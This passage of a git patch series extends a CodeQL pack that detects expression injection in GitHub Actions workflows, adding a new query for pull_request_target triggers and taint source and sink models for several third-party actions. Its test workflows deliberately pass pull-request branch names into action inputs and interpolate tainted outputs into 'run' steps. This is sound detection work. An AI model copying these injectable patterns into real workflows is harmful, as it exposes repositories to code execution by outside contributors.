stepsCtxLocalStep(nodeFrom, nodeTo) or + needsCtxLocalStep(nodeFrom, nodeTo) or inputsCtxLocalStep(nodeFrom, nodeTo) or envCtxLocalStep(nodeFrom, nodeTo) } diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll index 8b62cccf30af..5fe3c7417351 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll @@ -66,6 +66,17 @@ class ParameterNode extends ExprNode { InputExpr getInputExpr() { result = input } } +/** + * A call to a data flow callable (Uses). + */ +class CallNode extends ExprNode { + private DataFlowCall call; + + CallNode() { this.getCfgNode() instanceof DataFlowCall } + + string getCallee() { result = this.getCfgNode().(DataFlowCall).getName() } +} + /** * An argument to a Uses step (call). */ diff --git a/ql/lib/ext/TEST-RW-MODELS.model.yml b/ql/lib/ext/TEST-RW-MODELS.model.yml new file mode 100644 index 000000000000..7adbcd5adbd1 --- /dev/null +++ b/ql/lib/ext/TEST-RW-MODELS.model.yml @@ -0,0 +1,17 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: summaryModel + data: + - ["octo-org/this-repo/.github/workflows/workflow.yml", "*", "input.config-path", "output.workflow-output", "taint"] + - ["octo-org/summary-repo/.github/workflows/workflow.yml", "*", "input.config-path", "output.workflow-output", "taint"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sourceModel + data: + - ["octo-org/source-repo/.github/workflows/workflow.yml", "*", "output.workflow-output", "*", "Foo"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["octo-org/sink-repo/.github/workflows/workflow.yml", "*", "input.config-path", "expression-injection"] diff --git a/ql/lib/test/test.ql b/ql/lib/test/test.ql index 4b2be43bbdaf..168987284c31 100644 --- a/ql/lib/test/test.ql +++ b/ql/lib/test/test.ql @@ -43,14 +43,9 @@ query predicate nonOrphanVarAccesses(ExprAccessExpr va, string var, AstNode pare query predicate parentNodes(AstNode child, AstNode parent) { child.getParentNode() = parent } -query predicate cfgNodes(Cfg::Node n) { - //any() - n.getAstNode() instanceof OutputsStmt -} +query predicate cfgNodes(Cfg::Node n) { any() } -query predicate dfNodes(DataFlow::Node e) { - e.getLocation().getFile().getBaseName() = "argus_case_study.yml" -} +query predicate dfNodes(DataFlow::Node e) { any() } query predicate exprNodes(DataFlow::ExprNode e) { any() } @@ -69,3 +64,7 @@ query predicate sources(string action, string version, string output, string tri query predicate summaries(string action, string version, string input, string output, string kind) { summaryModel(action, version, input, output, kind) } + +query predicate calls(DataFlow::CallNode call, string callee) { callee = call.getCallee() } + +query predicate needs(DataFlow::ExprNode e) { e.asExpr() instanceof NeedsCtxAccessExpr } diff --git a/ql/src/test/.github/workflows/calling_workflow.yml b/ql/src/test/.github/workflows/calling_workflow.yml index 9aafe1189efa..7c2bfdf0348f 100644 --- a/ql/src/test/.github/workflows/calling_workflow.yml +++ b/ql/src/test/.github/workflows/calling_workflow.yml @@ -8,17 +8,20 @@ jobs: uses: octo-org/this-repo/.github/workflows/reusable_workflow.yml@172239021f7ba04fe7327647b213799853a9eb89 with: config-path: ${{ github.event.pull_request.head.ref }} - secrets: inherit call2: uses: ./.github/workflows/reusable_workflow.yml with: config-path: ${{ github.event.pull_request.head.ref }} - secrets: inherit call3: - uses: octo-org/another-repo/.github/workflows/workflow.yml@v1 + uses: octo-org/summary-repo/.github/workflows/workflow.yml@v1 + with: + config-path: ${{ github.event.pull_request.head.ref }} + call4: + uses: octo-org/source-repo/.github/workflows/workflow.yml@v1 + call5: + uses: octo-org/sink-repo/.github/workflows/workflow.yml@v1 with: config-path: ${{ github.event.pull_request.head.ref }} - secrets: inherit job1: runs-on: ubuntu-latest @@ -36,3 +39,8 @@ jobs: needs: call3 steps: - run: echo ${{ needs.call3.outputs.workflow-output }} + job4: + runs-on: ubuntu-latest + needs: call4 + steps: + - run: echo ${{ needs.call4.outputs.workflow-output }} From a2210dca79e5bbd4bda0b1bbe3d965c58facfdc2 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 20 Feb 2024 21:48:29 +0100 Subject: [PATCH 061/707] feat(triggers): Add getEnclosingWorkflowStmt to Statement class --- ql/lib/codeql/actions/Ast.qll | 22 ++++++--- .../CWE-094/CriticalExpressionInjection.ql | 47 +++++++++++++++++++ .../Security/CWE-094/ExpressionInjection.ql | 2 +- ql/src/test/.github/workflows/simple2.yml | 5 +- 4 files changed, 64 insertions(+), 12 deletions(-) create mode 100644 ql/src/Security/CWE-094/CriticalExpressionInjection.ql diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 605f658b263b..5037a55d6329 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -20,7 +20,10 @@ class AstNode instanceof YamlNode { * A statement is a group of expressions and/or statements that you design to carry out a task or an action. * Any statement that can return a value is automatically qualified to be used as an expression. */ -class Statement extends AstNode { } +class Statement extends AstNode { + /** Gets the workflow that this job is a part of. */ + WorkflowStmt getEnclosingWorkflowStmt() { exists(WorkflowStmt w | w.getAChildNode*() = result) } +} /** * An expression is any word or group of words or symbols that is a value. In programming, an expression is a value, or anything that executes and ends up being a value. @@ -53,6 +56,14 @@ class WorkflowStmt extends Statement instanceof Actions::Workflow { JobStmt getAJobStmt() { result = super.getJob(_) } JobStmt getJobStmt(string id) { result = super.getJob(id) } + + predicate hasTriggerEvent(string trigger) { + exists(YamlNode n | n = super.getOn().(YamlMappingLikeNode).getNode(trigger)) + } + + string getATriggerEvent() { + exists(YamlNode n | n = super.getOn().(YamlMappingLikeNode).getNode(result)) + } } class ReusableWorkflowStmt extends WorkflowStmt { @@ -122,9 +133,6 @@ class JobStmt extends Statement instanceof Actions::Job { */ string getId() { result = super.getId() } - /** Gets the workflow that this job is a part of. */ - WorkflowStmt getWorkflowStmt() { result = super.getWorkflow() } - /** Gets the step at the given index within this job. */ StepStmt getStepStmt(int index) { result = super.getStep(index) } @@ -222,7 +230,7 @@ class StepUsesExpr extends StepStmt, UsesExpr { ) or exists(Actions::WorkflowEnv env | - env.getWorkflow() = this.getJobStmt().getWorkflowStmt() and + env.getWorkflow() = this.getJobStmt().getEnclosingWorkflowStmt() and env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) ) } @@ -287,7 +295,7 @@ class JobUsesExpr extends UsesExpr instanceof YamlMapping { ) or exists(Actions::WorkflowEnv env | - env.getWorkflow() = this.getJobStmt().getWorkflowStmt() and + env.getWorkflow() = this.getJobStmt().getEnclosingWorkflowStmt() and env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) ) } @@ -320,7 +328,7 @@ class RunExpr extends StepStmt, Expression { ) or exists(Actions::WorkflowEnv env | - env.getWorkflow() = this.getJobStmt().getWorkflowStmt() and + env.getWorkflow() = this.getJobStmt().getEnclosingWorkflowStmt() and env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) ) } diff --git a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql new file mode 100644 index 000000000000..624bd32e45cb --- /dev/null +++ b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql @@ -0,0 +1,47 @@ +/** + * @name Expression injection in Actions + * @description Using user-controlled GitHub Actions contexts like `run:` or `script:` may allow a malicious + * user to inject code into the GitHub action. + * @kind path-problem + * @problem.severity error + * @security-severity 9 + * @precision high + * @id actions/critical-expression-injection + * @tags actions + * security + * external/cwe/cwe-094 + */ + +import actions +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources +import codeql.actions.dataflow.ExternalFlow + +private class ExpressionInjectionSink extends DataFlow::Node { + ExpressionInjectionSink() { + exists(RunExpr e | e.getScriptExpr() = this.asExpr()) or + externallyDefinedSink(this, "expression-injection") + } +} + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + + predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink +where + MyFlow::flowPath(source, sink) and + source + .getNode() + .asExpr() + .(Statement) + .getEnclosingWorkflowStmt() + .hasTriggerEvent("pull_request_target") +select sink.getNode(), source, sink, + "Potential expression injection, which may be controlled by an external user." diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql index 99779d6cc907..c34fcb74bbc0 100644 --- a/ql/src/Security/CWE-094/ExpressionInjection.ql +++ b/ql/src/Security/CWE-094/ExpressionInjection.ql @@ -4,7 +4,7 @@ * user to inject code into the GitHub action. * @kind path-problem * @problem.severity warning - * @security-severity 9.3 + * @security-severity 5.0 * @precision high * @id actions/expression-injection * @tags actions diff --git a/ql/src/test/.github/workflows/simple2.yml b/ql/src/test/.github/workflows/simple2.yml index b40f5eb6ac05..8271f93d857f 100644 --- a/ql/src/test/.github/workflows/simple2.yml +++ b/ql/src/test/.github/workflows/simple2.yml @@ -1,9 +1,6 @@ name: CI -on: - pull_request: - branches: - - main +on: [pull_request_target, pull_request] jobs: changed_files: From 3814462266e9482cc9686f60257006f45f8165bc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 21 Feb 2024 10:23:37 +0100 Subject: [PATCH 062/707] feat(triggers): New query for critical issues Adds a new query and the required changes to be able to account for the trigger events so that we dont report issues if they are not likely exploitable. --- ql/lib/codeql/actions/Ast.qll | 4 +- .../codeql/actions/dataflow/ExternalFlow.qll | 6 ++- .../codeql/actions/dataflow/FlowSources.qll | 38 ++++++++++++++----- .../dataflow/internal/DataFlowPrivate.qll | 4 +- ...ahmadnassri_action-changed-files.model.yml | 2 - ql/lib/ext/dorny_paths-filter.model.yml | 1 - .../ext/jitterbit_get-changed-files.model.yml | 7 ---- ql/lib/ext/tj-actions_branch-names.model.yml | 11 ++++++ ql/lib/ext/tj-actions_changed-files.model.yml | 17 --------- .../tj-actions_verify-changed-files.model.yml | 1 - .../CWE-094/CriticalExpressionInjection.ql | 2 +- 11 files changed, 50 insertions(+), 43 deletions(-) create mode 100644 ql/lib/ext/tj-actions_branch-names.model.yml diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 5037a55d6329..2e93187b6bf0 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -22,7 +22,9 @@ class AstNode instanceof YamlNode { */ class Statement extends AstNode { /** Gets the workflow that this job is a part of. */ - WorkflowStmt getEnclosingWorkflowStmt() { exists(WorkflowStmt w | w.getAChildNode*() = result) } + WorkflowStmt getEnclosingWorkflowStmt() { + exists(WorkflowStmt w | w.getAChildNode*() = this and result = w) + } } /** diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index 6446fbb55728..594b6017729e 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -39,8 +39,10 @@ predicate sinkModel(string action, string version, string input, string kind) { Extensions::sinkModel(action, version, input, kind) } -predicate externallyDefinedSource(DataFlow::Node source, string sourceType, string fieldName) { - exists(UsesExpr uses, string action, string version, string trigger, string kind | +predicate externallyDefinedSource( + DataFlow::Node source, string sourceType, string fieldName, string trigger +) { + exists(UsesExpr uses, string action, string version, string kind | sourceModel(action, version, fieldName, trigger, kind) and uses.getCallee() = action.toLowerCase() and ( diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 09094f2c580c..0e82498bfc15 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -17,6 +17,8 @@ abstract class RemoteFlowSource extends SourceNode { /** Gets a string that describes the type of this remote flow source. */ abstract string getSourceType(); + abstract string getATriggerEvent(); + override string getThreatModel() { result = "remote" } } @@ -109,20 +111,33 @@ private predicate isExternalUserControlledWorkflowRun(string context) { } private class EventSource extends RemoteFlowSource { + string trigger; + EventSource() { exists(ExprAccessExpr e, string context | this.asExpr() = e and context = e.getExpression() | - isExternalUserControlledIssue(context) or - isExternalUserControlledPullRequest(context) or - isExternalUserControlledReview(context) or - isExternalUserControlledComment(context) or - isExternalUserControlledGollum(context) or - isExternalUserControlledCommit(context) or - isExternalUserControlledDiscussion(context) or - isExternalUserControlledWorkflowRun(context) + trigger = ["issues", "issue_comment"] and isExternalUserControlledIssue(context) + or + trigger = ["pull_request_target", "pull_request_review", "pull_request_review_comment"] and + isExternalUserControlledPullRequest(context) + or + trigger = ["pull_request_review"] and isExternalUserControlledReview(context) + or + trigger = ["pull_request_review_comment", "issue_comment", "discussion_comment"] and + isExternalUserControlledComment(context) + or + trigger = ["gollum"] and isExternalUserControlledGollum(context) + or + trigger = ["push"] and isExternalUserControlledCommit(context) + or + trigger = ["discussion", "discussion_comment"] and isExternalUserControlledDiscussion(context) + or + trigger = ["workflow_run"] and isExternalUserControlledWorkflowRun(context) ) } override string getSourceType() { result = "User-controlled events" } + + override string getATriggerEvent() { result = trigger } } /** @@ -130,10 +145,13 @@ private class EventSource extends RemoteFlowSource { */ private class ExternallyDefinedSource extends RemoteFlowSource { string sourceType; + string trigger; - ExternallyDefinedSource() { externallyDefinedSource(this, sourceType, _) } + ExternallyDefinedSource() { externallyDefinedSource(this, sourceType, _, trigger) } override string getSourceType() { result = sourceType } + + override string getATriggerEvent() { result = trigger } } /** @@ -145,4 +163,6 @@ private class CompositeActionInputSource extends RemoteFlowSource { CompositeActionInputSource() { c.getInputsStmt().getInputExpr(_) = this.asExpr() } override string getSourceType() { result = "Composite action input" } + + override string getATriggerEvent() { result = "*" } } diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 89f31983189a..ae99e7c91849 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -173,7 +173,7 @@ predicate parameterMatch(ParameterPosition ppos, ArgumentPosition apos) { ppos = */ predicate stepsCtxLocalStep(Node nodeFrom, Node nodeTo) { exists(UsesExpr astFrom, StepsCtxAccessExpr astTo | - externallyDefinedSource(nodeFrom, _, "output." + astTo.getFieldName()) and + externallyDefinedSource(nodeFrom, _, "output." + astTo.getFieldName(), _) and astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and astTo.getRefExpr() = astFrom @@ -201,7 +201,7 @@ predicate envCtxLocalStep(Node nodeFrom, Node nodeTo) { astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and ( - externallyDefinedSource(nodeFrom, _, "env." + astTo.getFieldName()) or + externallyDefinedSource(nodeFrom, _, "env." + astTo.getFieldName(), _) or astTo.getRefExpr() = astFrom ) ) diff --git a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml index 8f449f6b26db..34cb56a01ad4 100644 --- a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml +++ b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml @@ -3,7 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["ahmadnassri/action-changed-files", "*", "output.files", "pull_request", "PR changed files"] - ["ahmadnassri/action-changed-files", "*", "output.files", "pull_request_target", "PR changed files"] - - ["ahmadnassri/action-changed-files", "*", "output.json", "pull_request", "PR changed files"] - ["ahmadnassri/action-changed-files", "*", "output.json", "pull_request_target", "PR changed files"] diff --git a/ql/lib/ext/dorny_paths-filter.model.yml b/ql/lib/ext/dorny_paths-filter.model.yml index 6ee41e93826c..6fefec9a4f8f 100644 --- a/ql/lib/ext/dorny_paths-filter.model.yml +++ b/ql/lib/ext/dorny_paths-filter.model.yml @@ -3,5 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["dorny/paths-filter", "*", "output.changes", "pull_request", "PR changed files"] - ["dorny/paths-filter", "*", "output.changes", "pull_request_target", "PR changed files"] diff --git a/ql/lib/ext/jitterbit_get-changed-files.model.yml b/ql/lib/ext/jitterbit_get-changed-files.model.yml index f19a2da37f5e..d7cbde25b88f 100644 --- a/ql/lib/ext/jitterbit_get-changed-files.model.yml +++ b/ql/lib/ext/jitterbit_get-changed-files.model.yml @@ -3,17 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["jitterbit/get-changed-files", "*", "output.all", "pull_request", "PR changed files"] - ["jitterbit/get-changed-files", "*", "output.all", "pull_request_target", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "output.added", "pull_request", "PR changed files"] - ["jitterbit/get-changed-files", "*", "output.added", "pull_request_target", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "output.modified", "pull_request", "PR changed files"] - ["jitterbit/get-changed-files", "*", "output.modified", "pull_request_target", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "output.removed", "pull_request", "PR changed files"] - ["jitterbit/get-changed-files", "*", "output.removed", "pull_request_target", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "output.renamed", "pull_request", "PR changed files"] - ["jitterbit/get-changed-files", "*", "output.renamed", "pull_request_target", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "output.added_modified", "pull_request", "PR changed files"] - ["jitterbit/get-changed-files", "*", "output.added_modified", "pull_request_target", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "output.deleted", "pull_request", "PR changed files"] - ["jitterbit/get-changed-files", "*", "output.deleted", "pull_request_target", "PR changed files"] diff --git a/ql/lib/ext/tj-actions_branch-names.model.yml b/ql/lib/ext/tj-actions_branch-names.model.yml new file mode 100644 index 000000000000..20383f415c28 --- /dev/null +++ b/ql/lib/ext/tj-actions_branch-names.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sourceModel + data: + # https://github.com/tj-actions/branch-names + - ["tj-actions/branch-names", "*", "output.base_ref_branch", "pull_request_target", "PR base branch"] + - ["tj-actions/branch-names", "*", "output.current_branch", "pull_request_target", "PR current branch"] + - ["tj-actions/branch-names", "*", "output.head_ref_branch", "pull_request_target", "PR head branch"] + - ["tj-actions/branch-names", "*", "output.ref_branch", "pull_request_target", "Branch tirggering workflow run"] + diff --git a/ql/lib/ext/tj-actions_changed-files.model.yml b/ql/lib/ext/tj-actions_changed-files.model.yml index fc5557db6ea9..21a0b479ef55 100644 --- a/ql/lib/ext/tj-actions_changed-files.model.yml +++ b/ql/lib/ext/tj-actions_changed-files.model.yml @@ -3,37 +3,20 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["tj-actions/changed-files", "*", "output.added_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.added_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.copied_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.copied_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.deleted_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.deleted_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.modified_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.modified_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.renamed_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.renamed_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.all_old_new_renamed_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.all_old_new_renamed_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.type_changed_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.type_changed_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.unmerged_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.unmerged_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.unknown_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.unknown_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.all_changed_and_modified_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.all_changed_and_modified_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.all_changed_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.all_changed_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.other_changed_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.other_changed_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.all_modified_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.all_modified_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.other_modified_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.other_modified_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.other_deleted_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.other_deleted_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.modified_keys", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.modified_keys", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.changed_keys", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.changed_keys", "pull_request_target", "PR changed files"] diff --git a/ql/lib/ext/tj-actions_verify-changed-files.model.yml b/ql/lib/ext/tj-actions_verify-changed-files.model.yml index 76d83bd249e1..9b6649892afa 100644 --- a/ql/lib/ext/tj-actions_verify-changed-files.model.yml +++ b/ql/lib/ext/tj-actions_verify-changed-files.model.yml @@ -3,5 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["tj-actions/verify-changed-files", "*", "output.changed-files", "pull_request", "PR changed files"] - ["tj-actions/verify-changed-files", "*", "output.changed-files", "pull_request_target", "PR changed files"] diff --git a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql index 624bd32e45cb..a6baf060c9d8 100644 --- a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql +++ b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql @@ -42,6 +42,6 @@ where .asExpr() .(Statement) .getEnclosingWorkflowStmt() - .hasTriggerEvent("pull_request_target") + .hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) select sink.getNode(), source, sink, "Potential expression injection, which may be controlled by an external user." From 3aa4f7f1afc911f7ef871d2b3d22daea7ae2ac41 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 20 Feb 2024 21:48:29 +0100 Subject: [PATCH 063/707] feat(triggers): Add getEnclosingWorkflowStmt to Statement class --- ql/lib/codeql/actions/Ast.qll | 22 ++++++--- .../CWE-094/CriticalExpressionInjection.ql | 47 +++++++++++++++++++ .../Security/CWE-094/ExpressionInjection.ql | 2 +- ql/src/test/.github/workflows/simple2.yml | 5 +- 4 files changed, 64 insertions(+), 12 deletions(-) create mode 100644 ql/src/Security/CWE-094/CriticalExpressionInjection.ql diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 605f658b263b..5037a55d6329 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -20,7 +20,10 @@ class AstNode instanceof YamlNode { * A statement is a group of expressions and/or statements that you design to carry out a task or an action. * Any statement that can return a value is automatically qualified to be used as an expression. */ -class Statement extends AstNode { } +class Statement extends AstNode { + /** Gets the workflow that this job is a part of. */ + WorkflowStmt getEnclosingWorkflowStmt() { exists(WorkflowStmt w | w.getAChildNode*() = result) } +} /** * An expression is any word or group of words or symbols that is a value. In programming, an expression is a value, or anything that executes and ends up being a value. @@ -53,6 +56,14 @@ class WorkflowStmt extends Statement instanceof Actions::Workflow { JobStmt getAJobStmt() { result = super.getJob(_) } JobStmt getJobStmt(string id) { result = super.getJob(id) } + + predicate hasTriggerEvent(string trigger) { + exists(YamlNode n | n = super.getOn().(YamlMappingLikeNode).getNode(trigger)) + } + + string getATriggerEvent() { + exists(YamlNode n | n = super.getOn().(YamlMappingLikeNode).getNode(result)) + } } class ReusableWorkflowStmt extends WorkflowStmt { @@ -122,9 +133,6 @@ class JobStmt extends Statement instanceof Actions::Job { */ string getId() { result = super.getId() } - /** Gets the workflow that this job is a part of. */ - WorkflowStmt getWorkflowStmt() { result = super.getWorkflow() } - /** Gets the step at the given index within this job. */ StepStmt getStepStmt(int index) { result = super.getStep(index) } @@ -222,7 +230,7 @@ class StepUsesExpr extends StepStmt, UsesExpr { ) or exists(Actions::WorkflowEnv env | - env.getWorkflow() = this.getJobStmt().getWorkflowStmt() and + env.getWorkflow() = this.getJobStmt().getEnclosingWorkflowStmt() and env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) ) } @@ -287,7 +295,7 @@ class JobUsesExpr extends UsesExpr instanceof YamlMapping { ) or exists(Actions::WorkflowEnv env | - env.getWorkflow() = this.getJobStmt().getWorkflowStmt() and + env.getWorkflow() = this.getJobStmt().getEnclosingWorkflowStmt() and env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) ) } @@ -320,7 +328,7 @@ class RunExpr extends StepStmt, Expression { ) or exists(Actions::WorkflowEnv env | - env.getWorkflow() = this.getJobStmt().getWorkflowStmt() and + env.getWorkflow() = this.getJobStmt().getEnclosingWorkflowStmt() and env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) ) } diff --git a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql new file mode 100644 index 000000000000..624bd32e45cb --- /dev/null +++ b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql @@ -0,0 +1,47 @@ +/** + * @name Expression injection in Actions + * @description Using user-controlled GitHub Actions contexts like `run:` or `script:` may allow a malicious + * user to inject code into the GitHub action. + * @kind path-problem + * @problem.severity error + * @security-severity 9 + * @precision high + * @id actions/critical-expression-injection + * @tags actions + * security + * external/cwe/cwe-094 + */ + +import actions +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources +import codeql.actions.dataflow.ExternalFlow + +private class ExpressionInjectionSink extends DataFlow::Node { + ExpressionInjectionSink() { + exists(RunExpr e | e.getScriptExpr() = this.asExpr()) or + externallyDefinedSink(this, "expression-injection") + } +} + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + + predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink +where + MyFlow::flowPath(source, sink) and + source + .getNode() + .asExpr() + .(Statement) + .getEnclosingWorkflowStmt() + .hasTriggerEvent("pull_request_target") +select sink.getNode(), source, sink, + "Potential expression injection, which may be controlled by an external user." diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql index 99779d6cc907..c34fcb74bbc0 100644 --- a/ql/src/Security/CWE-094/ExpressionInjection.ql +++ b/ql/src/Security/CWE-094/ExpressionInjection.ql @@ -4,7 +4,7 @@ * user to inject code into the GitHub action. * @kind path-problem * @problem.severity warning - * @security-severity 9.3 + * @security-severity 5.0 * @precision high * @id actions/expression-injection * @tags actions diff --git a/ql/src/test/.github/workflows/simple2.yml b/ql/src/test/.github/workflows/simple2.yml index b40f5eb6ac05..8271f93d857f 100644 --- a/ql/src/test/.github/workflows/simple2.yml +++ b/ql/src/test/.github/workflows/simple2.yml @@ -1,9 +1,6 @@ name: CI -on: - pull_request: - branches: - - main +on: [pull_request_target, pull_request] jobs: changed_files: From ea29a09fd7ea8ccc8a1c87e7b5914a54333312eb Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 21 Feb 2024 10:23:37 +0100 Subject: [PATCH 064/707] feat(triggers): New query for critical issues Adds a new query and the required changes to be able to account for the trigger events so that we dont report issues if they are not likely exploitable. --- ql/lib/codeql/actions/Ast.qll | 4 +- .../codeql/actions/dataflow/ExternalFlow.qll | 6 ++- .../codeql/actions/dataflow/FlowSources.qll | 38 ++++++++++++++----- .../dataflow/internal/DataFlowPrivate.qll | 4 +- ...ahmadnassri_action-changed-files.model.yml | 2 - ql/lib/ext/dorny_paths-filter.model.yml | 1 - .../ext/jitterbit_get-changed-files.model.yml | 7 ---- ql/lib/ext/tj-actions_branch-names.model.yml | 11 ++++++ ql/lib/ext/tj-actions_changed-files.model.yml | 17 --------- .../tj-actions_verify-changed-files.model.yml | 1 - .../CWE-094/CriticalExpressionInjection.ql | 2 +- 11 files changed, 50 insertions(+), 43 deletions(-) create mode 100644 ql/lib/ext/tj-actions_branch-names.model.yml diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 5037a55d6329..2e93187b6bf0 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ 